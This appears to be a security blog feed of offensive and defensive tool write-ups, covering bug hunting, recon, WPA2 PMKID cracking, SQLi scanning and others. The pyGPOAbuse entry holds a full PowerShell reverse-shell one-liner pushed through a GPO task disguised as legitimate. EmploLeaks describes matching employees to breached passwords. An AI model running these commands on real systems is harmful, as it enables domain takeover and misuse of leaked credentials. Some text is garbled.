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VulFi - Plugin To IDA Pro Which Can Be Used To Assist During Bug Hunting In Binaries

By: Zion3R
26 April 2022 at 21:30

The VulFi (Vulnerability Finder) tool is a plugin to IDA Pro which can be used to assist during bug hunting in binaries. Its main objective is to provide a single view with all cross-references to the most interesting functions (such as strcpy, sprintf, system, etc.). For cases where a Hexrays decompiler can be used, it will attempt to rule out calls to these functions which are not interesting from a vulnerability research perspective (think something like strcpy(dst,"Hello World!")). Without the decompiler, the rules are much simpler (to not depend on architecture) and thus only rule out the most obvious cases.


Place the, vulfi_prototypes.json and vulfi_rules.json files in the IDA plugin folder (cp vulfi* <IDA_PLUGIN_FOLDER>).

Preparing the Database File

Before you run VulFi make sure that you have a good understanding of the binary that you work with. Try to identify all standard functions (strcpy, memcpy, etc.) and name them accordingly. The plugin is case insensitive and thus MEMCPY, Memcpy and memcpy are all valid names. However, note that the search for the function requires exact match. This means that memcpy? or std_memcpy (or any other variant) will not be detected as a standard function and therefore will not be considered when looking for potential vulnerabilities. If you are working with an unknown binary you need to set the compiler options first Options > Compiler. After that VulFi will do its best to filter all obvious false positives (such as call to printf with constant string as a first parameter). Please note that while the plugin is made without any ties to a specific ar chitecture some processors do not have full support for specifying types and in such case VulFi will simply mark all cross-references to potentially dangerous standard functions to allow you to proceed with manual analysis. In these cases, you can benefit from the tracking features of the plugin.



To initiate the scan, select Search > VulFi option from the top bar menu. This will either initiate a new scan, or it will read previous results stored inside the idb/i64 file. The data are automatically saved whenever you save the database.

Once the scan is completed or once the previous results are loaded a table will be presented with a view containing following columns:

  • IssueName - Used as a title for the suspected issue.
  • FunctionName - Name of the function.
  • FoundIn - The function that contains the potentially interesting reference.
  • Address - The address of the detected call.
  • Status - The review status, initial Not Checked is assigned to every new item. The other statuses are False Positive, Suspicious and Vulnerable. Those can be set using a right-click menu on a given item and should reflect the results of the manual review of the given function call.
  • Priority - An attempt to prioritize more interesting calls over the less interesting ones. Possible values are High, Medium and Low. The priorities are defined along with other rules in vulfi_rules.json file.
  • Comment - A user defined comment for the given item.

In case that there are no data inside the idb/i64 file or user decides to perform a new scan. The plugin will ask whether it should run the scan using the default included rules or whether it should use a custom rules file. Please note that running a new scan with already existing data does not overwrite the previously found items identified by the rule with the same name as the one with previously stored results. Therefore, running the scan again does not delete existing comments and status updates.

In the right-click context menu within the VulFi view, you can also remove the item from the results or remove all items. Please note that any comments or status updates will be lost after performing this operation.


Whenever you would like to inspect the detected instance of a possible vulnerable function, just double-click anywhere in the desired row and IDA will take you to the memory location which was identified as potentially interesting. Using a right-click and option Set Vulfi Comment allows you to enter comment for the given instance (to justify the status for example).

Adding More Functions

The plugin also allows for creating custom rules. These rules could be defined in the IDA interface (ideal for single functions) or supplied as a custom rule file (ideal for rules that aim to cover multiple functions).

Within the Interface

When you would like to trace a custom function, which was identified during the analysis, just switch the IDA View to that function, right-click anywhere within its body and select Add current function to VulFi.

Custom Set of Rules

It is also possible to load a custom file with set of multiple rules. To create a custom rule file with the below structure you can use the included template file here.

[   // An array of rules
"name": "RULE NAME", // The name of the rule
"function_name_to_look_for" // List of all function names that should be matched against the conditions defined in this rule
"wrappers":true, // Look for wrappers of the above functions as well (note that the wrapped function has to also match the rule)
"High":"True", // If evaluates to True, mark with priority High (see Rules below)
"Medium":"False", // If evaluates to True, mark with priority Medium (see Rules below)
"Low": "False" // If evaluates to True, mark with priority Low (see Rules below)

An example rule that looks for all cross-references to function malloc and checks whether its paramter is not constant and whether the return value of the function is checked is shown below:

"name": "Possible Null Pointer Dereference",
"High":"not param[0].is_constant() and not function_call.return_value_checked()",
"Low": "False"


Available Variables

  • param[<index>]: Used to access the parameter to a function call (index starts at 0)
  • function_call: Used to access the function call event
  • param_count: Holds the count of parameters that were passed to a function

Available Functions

  • Is parameter a constant: param[<index>].is_constant()
  • Get numeric value of parameter: param[<index>].number_value()
  • Get string value of parameter: param[<index>].string_value()
  • Is parameter set to null after the call: param[<index>].set_to_null_after_call()
  • Is return value of a function checked: function_call.return_value_checked(<constant_to_check>)


  • Mark all calls to a function where third parameter is > 5: param[2].number_value() > 5
  • Mark all calls to a function where the second parameter contains "%s": "%s" in param[1].string_value()
  • Mark all calls to a function where the second parameter is not constant: not param[1].is_constant()
  • Mark all calls to a function where the return value is validated against the value that is equal to the number of parameters: function_call.return_value_checked(param_count)
  • Mark all calls to a function where the return value is validated against any value: function_call.return_value_checked()
  • Mark all calls to a function where none of the parameters starting from the third are constants: all(not p.is_constant() for p in param[2:])
  • Mark all calls to a function where any of the parameters are constant: any(p.is_constant() for p in param)
  • Mark all calls to a function: True

Issues and Warnings

  • When you request the parameter with index that is out of bounds any call to a function will be marked as Low priority. This is a way to avoid missing cross references where it was not possible to correctly get all parameters (this mainly applies to disassembly mode).
  • When you search within the VulFi view and change context out of the view and come back, the view will not load. You can solve this either by terminating the search operation before switching the context, moving the VulFi view to the side-view so that it is always visible or by closing and re-opening the view (no data will be lost).
  • Scans for more exotic architectures end with a lot of false positives.

Socialscan – Command-Line Tool To Check For Email And Social Media Username Usage

By: Darknet
29 April 2022 at 17:32
socialscan is an accurate command-line tool to check For email and social media username usage on online platforms, given an email address or username, socialscan returns whether it is available, taken or invalid on online platforms. Other similar tools check username availability by requesting the profile page of the username in question and based on […]

APT-Hunter – Threat Hunting Tool via Windows Event Log

By: Darknet
4 March 2021 at 17:16
APT-Hunter is a threat hunting tool for windows event logs made from the perspective of the purple team mindset to provide detection for APT movements hidden in the sea of windows event logs. [ad name=”Darknet_Body_468_Links”] This will help you to decrease the time to uncover suspicious activity and the tool will make good use of […]

Grype – Vulnerability Scanner For Container Images & Filesystems

By: Darknet
19 April 2021 at 10:11
Grype is a vulnerability scanner for container images and filesystems with an easy to install binary that supports the packages for most major *nix based operating systems. [ad name=”Darknet_Body_468_Links”] Features of Grype Vulnerability Scanner For Container Images & Filesystems Scan the contents of a container image or filesystem to find known vulnerabilities and find vulnerabilities […]

LibInjection – Detect SQL Injection (SQLi) and Cross-Site Scripting (XSS)

By: Darknet
7 May 2021 at 14:49
LibInjection is a C library to Detect SQL Injection (SQLi) and Cross-Site Scripting (XSS) through lexical analysis of real-world Attacks. [ad name=”Darknet_Body_468_Links”] SQLi and other injection attacks remain the top OWASP and CERT vulnerability. Current detection attempts frequently involve a myriad of regular expressions which are not only brittle and error-prone but also proven by […]

Vulhub – Pre-Built Vulnerable Docker Environments For Learning To Hack

By: Darknet
27 May 2021 at 10:57
Vulhub is an open-source collection of pre-built vulnerable docker environments for learning to hack. No pre-existing knowledge of docker is required, just execute two simple commands and you have a vulnerable environment. [ad name=”Darknet_Body_468_Links”] Features of Vulhub Pre-Built Vulnerable Docker Environments For Learning To Hack Vulhub contains many frameworks, databases, applications, programming languages and more […]

Aclpwn.Py – Exploit ACL Based Privilege Escalation Paths in Active Directory

By: Darknet
6 July 2021 at 16:16 is a tool that interacts with BloodHound to identify and exploit ACL based privilege escalation paths. [ad name=”Darknet_Body_468_Links”] It takes a starting and ending point and will use Neo4j pathfinding algorithms to find the most efficient ACL based privilege escalation path. Features of Aclpwn.Py Exploit ACL Based Privilege Escalation Paths in Active Directory Aclpwn.Py […]

Karkinos – Beginner Friendly Penetration Testing Tool

By: Darknet
30 August 2021 at 18:53
Karkinos is a light-weight Beginner Friendly Penetration Testing Tool, which is basically a ‘Swiss Army Knife’ for pen-testing and/or hacking CTF’s. [ad name=”Darknet_Body_468_Links”] Karkinos Beginner Friendly Penetration Testing Tool Features Encoding/Decoding characters Encrypting/Decrypting text or files Reverse shell handling Cracking and generating hashes How to Install Karkinos Beginner Friendly Penetration Testing Tool Dependencies are: Any […]

assetfinder – Find Related Domains and Subdomains

By: Darknet
29 December 2021 at 17:05
assetfinder is a Go-based tool to find related domains and subdomains that are potentially related to a given domain from a variety of sources including Facebook, ThreatCrowd, Virustotal and more. [ad name=”Darknet_Body_468_Links”] assetfinder uses a variety of sources including those in the infosec space and social networks which can give relevant info: certspotter hackertarget […]

CredNinja – Test Credential Validity of Dumped Credentials or Hashes

By: Darknet
5 January 2022 at 09:55
CredNinja is a tool to quickly test credential validity of dumped credentials (or hashes) across an entire network or domain very efficiently. [ad name=”Darknet_Body_468_Links”] At the core of it, you provide it with a list of credentials you have dumped (or hashes, it can pass-the-hash) and a list of systems on the domain (the author […]

CFRipper – CloudFormation Security Scanning & Audit Tool

By: Darknet
23 January 2022 at 17:15
CFRipper is a Python-based Library and CLI security analyzer that functions as an AWS CloudFormation security scanning and audit tool, it aims to prevent vulnerabilities from getting to production infrastructure through vulnerable CloudFormation scripts. [ad name=”Darknet_Body_468_Links”] You can use CFRipper to prevent deploying insecure AWS resources into your Cloud environment. You can write your own […]

Socialscan – Command-Line Tool To Check For Email And Social Media Username Usage

By: Darknet
29 April 2022 at 17:32
socialscan is an accurate command-line tool to check For email and social media username usage on online platforms, given an email address or username, socialscan returns whether it is available, taken or invalid on online platforms. Other similar tools check username availability by requesting the profile page of the username in question and based on […]

WebCopilot - An Automation Tool That Enumerates Subdomains Then Filters Out Xss, Sqli, Open Redirect, Lfi, Ssrf And Rce Parameters And Then Scans For Vulnerabilities

By: Zion3R
10 January 2024 at 11:30

WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.

The script first enumerate all the subdomains of the given target domain using assetfinder, sublister, subfinder, amass, findomain, hackertarget, riddler and crt then do active subdomain enumeration using gobuster from SecLists wordlist then filters out all the live subdomains using dnsx then it extract titles of the subdomains using httpx & scans for subdomain takeover using subjack. Then it uses gauplus & waybackurls to crawl all the endpoints of the given subdomains then it use gf patterns to filters out xss, lfi, ssrf, sqli, open redirect & rce parameters from that given subdomains, and then it scans for vulnerabilities on the sub domains using different open-source tools (like kxss, dalfox, openredirex, nuclei, etc). Then it'll print out the result of the scan and save all the output in a specified directory.



g!2m0:~ webcopilot -h
░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║ ░░░░██║░░██║░░░██║░░░
░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝ ░╚════╝░╚═╝░░░░░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░
[●] @h4r5h1t.hrs | G!2m0

webcopilot -d <target>
webcopilot -d <target> -s
webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains]

-d Add your target [Requried]
-o To save outputs in folder [Default:]
-t Number of threads [Default: 100]
-b Add your server for BXSS [Default: False]
-x Exclude out of scope domains [Default: False]
-s Run only Subdomain Enumeration [Default: False]
-h Show this help message

Example: webcopilot -d -o domain -t 333 -x exclude.txt -b testServer.xss
Use or to get your server

Installing WebCopilot

WebCopilot requires git to install successfully. Run the following command as a root to install webcopilot

git clone && cd webcopilot/ && chmod +x webcopilot && mv webcopilot /usr/bin/ && ./

Tools Used:


Running WebCopilot

To run the tool on a target, just use the following command.

g!2m0:~ webcopilot -d

The -o command can be used to specify an output dir.

g!2m0:~ webcopilot -d -o bugcrowd

The -s command can be used for only subdomain enumerations (Active + Passive and also get title & screenshots).

g!2m0:~ webcopilot -d -o bugcrowd -s 

The -t command can be used to add thrads to your scan for faster result.

g!2m0:~ webcopilot -d -o bugcrowd -t 333 

The -b command can be used for blind xss (OOB), you can get your server from xsshunter or interact

g!2m0:~ webcopilot -d -o bugcrowd -t 333 -b testServer.xss

The -x command can be used to exclude out of scope domains.

g!2m0:~ echo > excludeDomain.txt
g!2m0:~ webcopilot -d -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss


Default options looks like this:

g!2m0:~ webcopilot -d - bugcrowd
██╗░░░░░░░██╗███████╗██████╗░░█████╗░ █████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗
░╚██╗████╗██╔╝█ ███╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░
░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║░░░░░██║░░██║░░ ██║░░░
░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝░░╚════╝░╚═╝░░░ ░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░
[●] @h4r5h1t.hrs | G!2m0

[❌] Warning: Use with caution. You are responsible for your own actions.
[❌] Developers assume no liability and are not responsible for any misuse or damage cause by this tool.

Output: /home/gizmo/targets/bugcrowd
Threads: 100
Server: False
Exclude: False
Mode: Running all Enumeration
Time: 30-08-2021 15:10:00

[!] Please wait while scanning...

[●] Subdoamin Scanning is in progress: Scanning subdomains of
[●] Subdoamin Scanned - [assetfinder✔] Subdomain Found: 34
[●] Subdoamin Scanned - [sublist3r✔] Subdomain Found: 29
[●] Subdoamin Scanned - [subfinder✔] Subdomain Found: 54
[●] Subdoamin Scanned - [amass✔] Subdomain Found: 43
[●] Subdoamin Scanned - [findomain✔] Subdomain Found: 27

[●] Active Subdoamin Scanning is in progress:
[!] Please be patient. This may take a while...
[●] Active Subdoamin Scanned - [gobuster✔] Subdomain Found: 11
[●] Active Subdoamin Scanned - [amass✔] Subdomain Found: 0

[●] Subdomain Scanning: Filtering out of scope subdomains
[●] Subdomain Scanning: Filtering Alive subdomains
[●] Subdomain Scanning: Getting titles of valid subdomains
[●] Visual inspection of Subdoamins is completed. Check: /subdomains/aquatone/

[●] Scanning Completed for Subdomains of Total: 43 | Alive: 30

[●] Endpoints Scanning Completed for Subdomains of Total: 11032
[●] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of
[●] Vulnerabilities Scanned - [XSS✔] Found: 0
[●] Vulnerabilities Scanned - [SQLi✔] Found: 0
[●] Vulnerabilities Scanned - [LFI✔] Found: 0
[●] Vulnerabilities Scanned - [CRLF✔] Found: 0
[●] Vulnerabilities Scanned - [SSRF✔] Found: 0
[●] Vulnerabilities Scanned - [Sensitive Data✔] Found: 0
[●] Vulnerabilities Scanned - [Open redirect✔] Found: 0
[●] Vulnerabilities Scanned - [Subdomain Takeover✔] Found: 0
[●] Vulnerabilities Scanned - [Nuclie✔] Found: 0
[●] Vulnerabilities Scanning Completed for Subdomains of Check: /vulnerabilities/

▒█▀▀█ █▀▀ █▀▀ █░░█ █░░ ▀▀█▀▀
▒█▄▄▀ █▀▀ ▀▀█ █░░█ █░░ ░░█░░
▒█░▒█ ▀▀▀ ▀▀▀ ░▀▀▀ ▀▀▀ ░░▀░░

[+] Subdomains of
[+] Subdomains Found: 0
[+] Subdomains Alive: 0
[+] Endpoints: 11032
[+] XSS: 0
[+] SQLi: 0
[+] Open Redirect: 0
[+] SSRF: 0
[+] CRLF: 0
[+] LFI: 0
[+] Sensitive Data: 0
[+] Subdomain Takeover: 0
[+] Nuclei: 0


WebCopilot is inspired from Garud & Pinaak by ROX4R.

Thanks to the authors of the tools & wordlists used in this script.

@aboul3la @tomnomnom @lc @hahwul @projectdiscovery @maurosoria @shelld3v @devanshbatham @michenriksen @defparam @projectdiscovery @bp0lr @ameenmaali @sqlmapproject @dwisiswant0 @OWASP @OJ @Findomain @danielmiessler @1ndianl33t @ROX4R

Warning: Developers assume no liability and are not responsible for any misuse or damage cause by this tool. So, please se with caution because you are responsible for your own actions.

Bugsy - Command-line Interface Tool That Provides Automatic Security Vulnerability Remediation For Your Code

By: Zion3R
11 January 2024 at 11:30

Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.

What is Mobb?

Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.

What does Bugsy do?

Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).


  • Uses Checkmarx or Snyk CLI tools to run a SAST scan on a given open-source GitHub/GitLab repo
  • Analyzes the vulnerability report to identify issues that can be remediated automatically
  • Produces the code fixes and redirects the user to the fix report page on the Mobb platform


  • Analyzes the a Checkmarx/CodeQL/Fortify/Snyk vulnerability report to identify issues that can be remediated automatically
  • Produces the code fixes and redirects the user to the fix report page on the Mobb platform


This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code, it uses findings detected by the SAST tools mentioned above.


You can simply run Bugsy from the command line, using npx:

npx mobbdev

EmploLeaks - An OSINT Tool That Helps Detect Members Of A Company With Leaked Credentials

By: Zion3R
12 January 2024 at 11:30


This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.

How it Works

The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You an easily add yours and connect to through the tool.


To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:

cd cli
pip install -r requirements.txt


We know that there is a problem when installing the tool due to the psycopg2 binary. If you run into this problem, you can solve it running:

cd cli
python3 -m pip install psycopg2-binary`

Basic Usage

To use the tool, simply run the following command:

python3 cli/

If everything went well during the installation, you will be able to start using EmploLeaks:

___________              .__         .__                 __
\_ _____/ _____ ______ | | ____ | | ____ _____ | | __ ______
| __)_ / \____ \| | / _ \| | _/ __ \__ \ | |/ / / ___/
| \ Y Y \ |_> > |_( <_> ) |_\ ___/ / __ \| < \___ \
/_______ /__|_| / __/|____/\____/|____/\___ >____ /__|_ \/____ >
\/ \/|__| \/ \/ \/ \/

OSINT tool 🕵 to chain multiple apis

Right now, the tool supports two functionalities:

  • Linkedin, for searching all employees from a company and get their personal emails.
    • A GitLab extension, which is capable of finding personal code repositories from the employees.
  • If defined and connected, when the tool is gathering employees profiles, a search to a COMB database will be made in order to retrieve leaked passwords.

Retrieving Linkedin Profiles

First, you must set the plugin to use, which in this case is linkedin. After, you should set your authentication tokens and the run the impersonate process:

emploleaks> use --plugin linkedin
emploleaks(linkedin)> setopt JSESSIONID
[+] Updating value successfull
emploleaks(linkedin)> setopt li-at
[+] Updating value successfull
emploleaks(linkedin)> show options
Module options:

Name Current Setting Required Description
---------- ----------------------------------- ---------- -----------------------------------
hide yes no hide the JSESSIONID field
JSESSIONID ************************** no active cookie session in browser #1
li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1
emploleaks(linkedin)> run i mpersonate
[+] Using cookies from the browser
Setting for first time JSESSIONID
Setting for first time li_at

li_at and JSESSIONID are the authentication cookies of your LinkedIn session on the browser. You can use the Web Developer Tools to get it, just sign-in normally at LinkedIn and press right click and Inspect, those cookies will be in the Storage tab.

Now that the module is configured, you can run it and start gathering information from the company:

Get Linkedin accounts + Leaked Passwords

We created a custom workflow, where with the information retrieved by Linkedin, we try to match employees' personal emails to potential leaked passwords. In this case, you can connect to a database (in our case we have a custom indexed COMB database) using the connect command, as it is shown below:

emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host
[+] Connecting to the Leak Database...
[*] version: PostgreSQL 12.15

Once it's connected, you can run the workflow. With all the users gathered, the tool will try to search in the database if a leaked credential is affecting someone:

As a conclusion, the tool will generate a console output with the following information:
  • A list of employees of the company (obtained from LinkedIn)
  • The social network profiles associated with each employee (obtained from email address)
  • A list of leaked passwords associated with each email address.

How to build the indexed COMB database

An imortant aspect of this project is the use of the indexed COMB database, to build your version you need to download the torrent first. Be careful, because the files and the indexed version downloaded requires, at least, 400 GB of disk space available.

Once the torrent has been completelly downloaded you will get a file folder as following:

├── data
│ ├── 0
│ ├── 1
│ │ ├── 0
│ │ ├── 1
│ │ ├── 2
│ │ ├── 3
│ │ ├── 4
│ │ ├─â&€ 5
│ │ ├── 6
│ │ ├── 7
│ │ ├── 8
│ │ ├── 9
│ │ ├── a
│ │ ├── b
│ │ ├── c
│ │ ├── d
│ │ ├── e
│ │ ├── f
│ │ ├── g
│ │ ├── h
│ │ ├── i
│ │ ├── j
│ │ ├── k
│ │ ├── l
│ │ ├── m
│ │ ├⠀─ n
│ │ ├── o
│ │ ├── p
│ │ ├── q
│ │ ├── r
│ │ ├── s
│ │ ├── symbols
│ │ ├── t

At this point, you could import all those files with the command create_db:

The importer takes a lot of time for that reason we recommend to run it with patience.

Next Steps

We are integrating other public sites and applications that may offer about a leaked credential. We may not be able to see the plaintext password, but it will give an insight if the user has any compromised credential:

  • Integration with Have I Been Pwned?
  • Integration with Firefox Monitor
  • Integration with Leak Check
  • Integration with BreachAlarm

Also, we will be focusing on gathering even more information from public sources of every employee. Do you have any idea in mind? Don't hesitate to reach us:

Or you con DM at @pastacls or @gaaabifranco on Twitter.

Logsensor - A Powerful Sensor Tool To Discover Login Panels, And POST Form SQLi Scanning

By: Zion3R
13 January 2024 at 11:30

A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning


  • login panel Scanning for multiple hosts
  • Proxy compatibility (http, https)
  • Login panel scanning are done in multiprocessing

so the script is super fast at scanning many urls

quick tutorial & screenshots are shown at the bottom
project contribution tips at the bottom



git clone
cd Logsensor && sudo chmod +x
pip install -r requirements.txt



Quick Tutorial

1. Multiple hosts scanning to detect login panels

  • You can increase the threads (default 30)
  • only run login detector module
python3 -f <subdomains-list> 
python3 -f <subdomains-list> -t 50
python3 -f <subdomains-list> --login

2. Targeted SQLi form scanning

  • can provide only specifc url of login panel with --sqli or -s flag for run only SQLi form scanning Module
  • turn on the proxy to see the requests
  • customize user input name of login panel with actual name (default "username")
python -u --sqli 
python -u -s --proxy
python -u -s --inputname email

View help

Login panel Detector Module -s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls -n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email') -t , --threads Number of threads (default 30) -h, --help Show this help message and exit " dir="auto">
python --help

usage: [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads]

optional arguments:
-u , --url Target URL (e.g. )
-f , --file Select a target hosts list file (e.g. list.txt )
--proxy Proxy (e.g.
-l, --login run only Login panel Detector Module
-s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls
-n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email')
-t , --threads Number of threads (default 30)
-h, --help Show this help message and exit




  1. adding "POST form SQli (Time based) scanning" and check for delay
  2. Fuzzing on Url Paths So as not to miss any login panel

EasyEASM - Zero-dollar Attack Surface Management Tool

By: Zion3R
14 January 2024 at 11:30

Zero-dollar attack surface management tool

featured at Black Hat Arsenal 2023 and Recon Village @ DEF CON 2023.


Easy EASM is just that... the easiest to set-up tool to give your organization visibility into its external facing assets.

The industry is dominated by $30k vendors selling "Attack Surface Management," but OG bug bounty hunters and red teamers know the truth. External ASM was born out of the bug bounty scene. Most of these $30k vendors use this open-source tooling on the backend.

With ten lines of setup or less, using open-source tools, and one button deployment, Easy EASM will give your organization a complete view of your online assets. Easy EASM scans you daily and alerts you via Slack or Discord on newly found assets! Easy EASM also spits out an Excel skeleton for a Risk Register or Asset Database! This isn't rocket science, but it's USEFUL. Don't get scammed. Grab Easy EASM and feel confident you know what's facing attackers on the internet.


go install

Example config file

The tool expects a configuration file named config.yml to be in the directory you are running from.

Here is example of this yaml file:

# EasyEASM configurations
domains: # List root domains here.
slack: # Slack webhook url for Slack notifications.
discord: # Discord webhook for Discord notifications.
runType: fast # Set to either fast (passive enum) or complete (active enumeration).
activeWordList: subdomainWordlist.txt
activeThreads: 100


To run the tool, fill out the config file: config.yml. Then, run the easyeasm module:


After the run is complete, you should see the output CSV (EasyEASM.csv) in the run directory. This CSV can be added to your asset database and risk register!


The creator(s) of this tool provides no warranty or assurance regarding its performance, dependability, or suitability for any specific purpose.

The tool is furnished on an "as is" basis without any form of warranty, whether express or implied, encompassing, but not limited to, implied warranties of merchantability, fitness for a particular purpose, or non-infringement.

The user assumes full responsibility for employing this tool and does so at their own peril. The creator(s) holds no accountability for any loss, damage, or expenses sustained by the user or any third party due to the utilization of this tool, whether in a direct or indirect manner.

Moreover, the creator(s) explicitly renounces any liability or responsibility for the accuracy, substance, or availability of information acquired through the use of this tool, as well as for any harm inflicted by viruses, malware, or other malicious components that may infiltrate the user's system as a result of employing this tool.

By utilizing this tool, the user acknowledges that they have perused and understood this warranty declaration and agree to undertake all risks linked to its utilization.


This project is licensed under the MIT License - see the for details.


For assistance, use the Issues tab. If we do not respond within 7 days, please reach out to us here.

Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

By: Zion3R
15 January 2024 at 11:30

This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.

Program Usage

python -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

  1. Pairwise Master Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations
  2. PMKID Calculation: HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]

This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.

*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.

Open the pcap in WireShark:

  • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
  • In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
  • In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below

If access point is vulnerable, you should see the PMKID value like the below screenshot:

Demo Run


This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.

CloudRecon - Finding assets from certificates

By: Zion3R
16 January 2024 at 11:30


Finding assets from certificates! Scan the web! Tool presented @DEFCON 31


** You must have CGO enabled, and may have to install gcc to run CloudRecon**

sudo apt install gcc
go install



CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.

Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all but many still need HTTPs.

CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers IPs) and find these hidden gems for testers, by inspecting those SSL certificates.

The tool suite is three parts in GO:

Scrape - A LIVE running tool to inspect the ranges for a keywork in SSL certs CN and SN fields in real time.

Store - a tool to retrieve IPs certs and download all their Orgs, CNs, and SANs. So you can have your OWN database.

Retr - a tool to parse and search through the downloaded certs for keywords.



Usage: CloudRecon scrape|store|retr [options]

-h Show the program usage message


cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file
cloudrecon retr - Query local DB file for results


scrape [options] -i <IPs/CIDRs or File>
-a Add this flag if you want to see all output including failures
-c int
How many goroutines running concurrently (default 100)
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" )
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)


store [options] -i <IPs/CIDRs or File>
-c int
How many goroutines running concurrently (default 100)
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)


retr [options]
Return all the rows in the DB
-cn string
String to search for in common name column, returns like-results (default "NONE")
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-ip string
String to search for in IP column, returns like-results (default "NONE")
Return the Number of rows (results) in the DB (By IP)
-org string
String to search for in Organization column, returns like-results (default "NONE")
-san string
String to search for in common name column, returns like-results (default "NONE")

pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse

By: Zion3R
17 January 2024 at 11:30

Python partial implementation of SharpGPOAbuse by@pkb1s

This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.

Default behavior adds a local administrator.

How to use

Basic usage

Add john user to local administrators group (Password: H4x00r123..)

./ DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

Advanced usage

Reverse shell example

./ DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
-powershell \
-command "\$client = New-Object System.Net.Sockets.TCPClient('',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
-taskname "Completely Legit Task" \
-description "Dis is legit, pliz no delete" \


FalconHound - A Blue Team Multi-Tool. It Allows You To Utilize And Enhance The Power Of Blo odHound In A More Automated Fashion

By: Zion3R
18 January 2024 at 11:30
